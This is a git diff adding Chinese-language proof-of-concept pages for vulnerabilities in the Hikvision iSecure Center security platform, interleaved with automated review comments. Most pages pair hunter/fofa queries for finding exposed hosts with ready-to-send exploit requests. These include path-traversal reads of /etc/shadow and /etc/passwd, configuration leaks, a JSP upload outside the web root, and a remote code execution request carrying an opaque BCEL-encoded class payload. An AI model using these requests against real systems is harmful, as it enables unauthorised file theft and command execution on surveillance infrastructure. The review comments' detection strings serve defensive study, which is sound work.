+![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/Cfz58EmYVbCTQdd3/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-961023.png) + ++ 登录页面 + +![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/Cfz58EmYVbCTQdd3/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-085091.png) + +# 四、漏洞复现 +```plain +/portal/conf/config.properties +``` + +![1698592701679-7048f5ce-cf66-4e17-927a-006bcaf9ea9c.png](./img/Cfz58EmYVbCTQdd3/1698592701679-7048f5ce-cf66-4e17-927a-006bcaf9ea9c-458685.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台download任意文件读取漏洞.md b/海康威视iSecureCenter综合安防管理平台download任意文件读取漏洞.md new file mode 100644 index 0000000..57c44c0 --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台download任意文件读取漏洞.md 
@@ -0,0 +1,33 @@ +# 海康威视iSecure Center 综合安防管理平台download任意文件读取漏洞 + +# 1、漏洞描述 +HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure Center 综合安防管理平台download任意文件读取漏洞 + +# 2、影响版本 +HIKVISION iSecure Center综合安防管理平台 + +![1691858087491-a6e46e3a-cb01-43dc-9dfc-382889c5dcae.png](./img/YR0nPcEELd6uSCWt/1691858087491-a6e46e3a-cb01-43dc-9dfc-382889c5dcae-599682.png) + +# 3、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +fofa:`title="综合安防管理平台"` + +# 4、漏洞复现 +```java +GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/shadow HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![1717149873962-7544801a-20c4-4831-a338-b486e5c32913.png](./img/YR0nPcEELd6uSCWt/1717149873962-7544801a-20c4-4831-a338-b486e5c32913-126761.png) + + + +> 更新: 2024-06-01 11:04:36 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台env信息泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台env信息泄漏漏洞.md new file mode 100644 index 0000000..97ab47f --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台env信息泄漏漏洞.md 
@@ -0,0 +1,36 @@ +# 海康威视iSecure Center综合安防管理平台 env 信息泄漏漏洞 + +# 一、漏洞简介 +HIKVISION 综合安防管理平台存在信息泄漏漏洞,攻击者通过漏洞可以获取环境env等敏感信息进一步攻击。 + +# 二、影响版本 ++ HIKVISION 综合安防管理平台 + +# 三、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/5PVxXecoDXiJN_Eu/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-751749.png) + ++ 登录页面 + +![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/5PVxXecoDXiJN_Eu/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-764837.png) + +# 四、漏洞复现 +```plain +/artemis-portal/artemis/env +``` + +![1691858136518-4966819b-3613-4ebc-8d53-8709141c80dc.png](./img/5PVxXecoDXiJN_Eu/1691858136518-4966819b-3613-4ebc-8d53-8709141c80dc-455276.png) + +```plain +/artemis/env +``` + +![1699978989500-f123cba1-ae00-40f3-907f-7c9e9706db80.png](./img/5PVxXecoDXiJN_Eu/1699978989500-f123cba1-ae00-40f3-907f-7c9e9706db80-476150.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台files接口存在任意文件读取漏洞.md b/海康威视iSecureCenter综合安防管理平台files接口存在任意文件读取漏洞.md new file mode 100644 index 0000000..4827c7e --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台files接口存在任意文件读取漏洞.md 
@@ -0,0 +1,34 @@ +# 海康威视iSecure Center 综合安防管理平台files 接口存在任意文件读取漏洞 + +# 一、漏洞简介 +HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure Center 综合安防管理平台files 接口存在任意文件读取漏洞,攻击者可通过该漏洞读取服务器上任意文件,获取敏感信息。 + +# 二、影响版本 ++ HIKVISION iSecure Center综合安防管理平台 + +# 三、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/OAqEWr4K1U6jmvTP/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-092169.png) + ++ 登录页面 + +![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/OAqEWr4K1U6jmvTP/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-321706.png) + +# 四、漏洞复现 +```plain +GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 +Connection: close +Accept-Encoding: gzip, deflate, br +``` + +![1701837056180-c3c2c99a-7025-482f-a16a-a184ea9b0619.png](./img/OAqEWr4K1U6jmvTP/1701837056180-c3c2c99a-7025-482f-a16a-a184ea9b0619-784391.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台findcomponent泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台findcomponent泄漏漏洞.md new file mode 100644 index 0000000..ffbecd1 --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台findcomponent泄漏漏洞.md 
@@ -0,0 +1,38 @@ +# 海康威视iSecure Center综合安防管理平台findcomponent泄漏漏洞 + +# 一、漏洞简介 +HIKVISION 综合安防管理平台component存在信息泄漏漏洞,攻击者通过漏洞可以获取环境等敏感信息进一步攻击。 + +# 二、影响版本 ++ HIKVISION 综合安防管理平台 + +# 三、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/4D8_uhrkeXQMXsJC/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-549805.png) + ++ 登录页面 + +![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/4D8_uhrkeXQMXsJC/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-064945.png) + +# 四、漏洞复现 +```java +GET /bic/caService/v1/certificate/machine/component HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 + +``` + +![1717150497083-b4bc9797-1270-41b7-87c0-771eb6ad1051.png](./img/4D8_uhrkeXQMXsJC/1717150497083-b4bc9797-1270-41b7-87c0-771eb6ad1051-960575.png) + + + +> 更新: 2024-06-01 11:04:37 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台find信息泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台find信息泄漏漏洞.md new file mode 100644 index 0000000..2bb94e5 --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台find信息泄漏漏洞.md 
@@ -0,0 +1,41 @@ +# 海康威视iSecure Center综合安防管理平台find信息泄漏漏洞 + +# 一、漏洞简介 +HIKVISION 综合安防管理平台存在信息泄漏漏洞,攻击者通过漏洞可以获取环境find等敏感信息进一步攻击。 + +# 二、影响版本 ++ HIKVISION 综合安防管理平台 + +# 三、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/XS4nHgxFeZcZ-7E8/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-166014.png) + ++ 登录页面 + +![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/XS4nHgxFeZcZ-7E8/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-968849.png) + +# 四、漏洞复现 +```java +POST /isupm/api/api/..;/..;/person/find HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Content-Length: 95 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Type: application/json;charset=utf-8 +Accept-Encoding: gzip, deflate + +{"organizationId":"root000000","pageSize":100,"pageNo":1,"name":"","casecadeSubOrganization":1} +``` + +![1711371978631-07879775-bcdf-4673-853d-c0e370b7119d.png](./img/XS4nHgxFeZcZ-7E8/1711371978631-07879775-bcdf-4673-853d-c0e370b7119d-882927.png) + +[hikvision-find-info.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1717211077763-07464109-609f-4f5b-bd65-72b7a7d05fe6.yaml) + + + +> 更新: 2024-06-01 11:04:37 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台lm任意文件上传漏洞.md b/海康威视iSecureCenter综合安防管理平台lm任意文件上传漏洞.md new file mode 100644 index 0000000..34f9d16 --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台lm任意文件上传漏洞.md 
@@ -0,0 +1,49 @@ +# 海康威视iSecure Center综合安防管理平台lm任意文件上传漏洞 + +# 1、漏洞描述 +HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞 + +# 2、影响版本 +HIKVISION iSecure Center综合安防管理平台 + +![1691858081036-d871cda5-31d1-4693-a77d-41c0bb876b49.png](./img/5ZrA5yjv_Euokk9i/1691858081036-d871cda5-31d1-4693-a77d-41c0bb876b49-238063.png) + +# 3、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +# 4、漏洞复现 +```plain +POST /lm/api/files;.css HTTP/1.1 +Host: 192.168.110.74 +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M +Content-Length: 342 +SL-CE-SUID: 39 + +------WebKitFormBoundaryVBf7Cs8QWsfwC82M +Content-Disposition: form-data; name="file"; filename="../../../../../tomcat85linux64.1/webapps/els/static/axaaxs.jsp" +Content-Type: application/zip + +<% out.println("testaxssax");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +------WebKitFormBoundaryVBf7Cs8QWsfwC82M-- +``` + +![1705912656579-0b74f2f8-cbab-4b04-a900-bb1f98c17b36.png](./img/5ZrA5yjv_Euokk9i/1705912656579-0b74f2f8-cbab-4b04-a900-bb1f98c17b36-353064.png) + +上传文件位置 + +```plain +/els/static/axaaxs.jsp +``` + +![1705912686065-2a7d66ab-a16e-4db2-bfbe-e0625f20dd76.png](./img/5ZrA5yjv_Euokk9i/1705912686065-2a7d66ab-a16e-4db2-bfbe-e0625f20dd76-489678.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台meta信息泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台meta信息泄漏漏洞.md new file mode 100644 index 0000000..a2ec778 --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台meta信息泄漏漏洞.md 
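Review bot: `Host: 192.168.110.74` in 海康威视iSecureCenter综合安防管理平台lm任意文件上传漏洞.md is a real lab address while every other file uses `xx.xx.xx.xx` or leaves Host empty; replace it with the placeholder. The 漏洞描述 paragraph is the same product blurb pasted verbatim into the ssoService, svm and applyCT files with only the final sentence changed; keep one copy and use the space to state the actual defect (a `filename` of `../../../../../tomcat85linux64.1/webapps/els/static/axaaxs.jsp` is written outside the intended upload directory) and the fix or mitigation (vendor patch, or denying external access to `/lm/api/files`), neither of which the page gives.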
@@ -0,0 +1,30 @@ +# 海康威视iSecure Center综合安防管理平台meta信息泄漏漏洞 + +# 一、漏洞简介 +HIKVISION 综合安防管理平台meta存在信息泄漏漏洞,攻击者通过漏洞可以获取环境等敏感信息进一步攻击。 + +# 二、影响版本 ++ HIKVISION 综合安防管理平台 + +# 三、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/UZEDmXJYIKlsRDjT/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-820227.png) + ++ 登录页面 + +![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/UZEDmXJYIKlsRDjT/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-907355.png) + +# 四、漏洞复现 +```java +/center/api/meta +``` + +![1717150124074-93684ec4-efd3-4ec9-a16f-3c4795af2dd1.png](./img/UZEDmXJYIKlsRDjT/1717150124074-93684ec4-efd3-4ec9-a16f-3c4795af2dd1-006232.png) + + + +> 更新: 2024-06-01 11:04:37 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台ssoService远程代码执行漏洞.md b/海康威视iSecureCenter综合安防管理平台ssoService远程代码执行漏洞.md new file mode 100644 index 0000000..10dd2f6 --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台ssoService远程代码执行漏洞.md 
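Review bot: the 漏洞复现 section of the meta file is a bare path `/center/api/meta` fenced as ```java; the other disclosure pages give at least the request line, and this one never says what the response contains or whether a session is needed, so severity cannot be judged from the text alone. Add the HTTP method, a redacted example of the leaked fields, and the affected/fixed versions.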
@@ -0,0 +1,38 @@ +# 海康威视iSecure Center 综合安防管理平台ssoService远程代码执行漏洞 + +# 1、漏洞描述 +HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在远程代码执行漏洞 + +# 2、影响版本 +HIKVISION iSecure Center综合安防管理平台 + +![1691858087491-a6e46e3a-cb01-43dc-9dfc-382889c5dcae.png](./img/yPdlHXujqASuCoZC/1691858087491-a6e46e3a-cb01-43dc-9dfc-382889c5dcae-608655.png) + +# 3、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +# 4、漏洞复现 +POC: + +```java +POST /bic/ssoService/v1/keepAlive HTTP/1.1 +Host: xx.xx.xx.xx +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Connection: close +Content-Type: application/json +Testcmd: whoami +Content-Length: 5727 + +{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}} +} +``` + +![1688607650157-857fe893-aef4-40b0-916a-a57a0274cba1.png](./img/yPdlHXujqASuCoZC/1688607650157-857fe893-aef4-40b0-916a-a57a0274cba1-202784.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台svm文件上传漏洞.md b/海康威视iSecureCenter综合安防管理平台svm文件上传漏洞.md new file mode 100644 index 0000000..0ddc262 --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台svm文件上传漏洞.md 
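Review bot: the `driverClassName` value in the ssoService keepAlive file is a `$$BCEL$$`-encoded compiled class committed as an opaque blob with no source, so nobody reviewing this repository can tell what it executes; the only hint is the `Testcmd: whoami` header. Commit the Java source (or at least a description of its behaviour and a hash of the blob) next to it, and note for defenders that `$$BCEL$$` inside a JSON body and `@type` keys naming `java.lang.Class` or `org.apache.tomcat.dbcp.dbcp2.BasicDataSource` are the strings worth alerting on. The same blob is pasted unchanged into the applyCT file; reference a single copy so the two cannot drift apart.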
@@ -0,0 +1,82 @@ +# 海康威视iSecureCenter综合安防管理平台 svm文件上传漏洞 + +# 1、漏洞描述 +HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台svm存在任意文件上传漏洞 + +# 2、影响版本 +HIKVISION iSecure Center综合安防管理平台 + +![1691858068026-c05d2dfd-ab38-44cf-a7d4-f5cf0f1be4a1.png](./img/icW1dT4mb2htBLN1/1691858068026-c05d2dfd-ab38-44cf-a7d4-f5cf0f1be4a1-550556.png) + +# 3、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +# 4、漏洞复现 +POC: + +`https://ip/svm/api/external/report` + +判断是否存在该漏洞 + 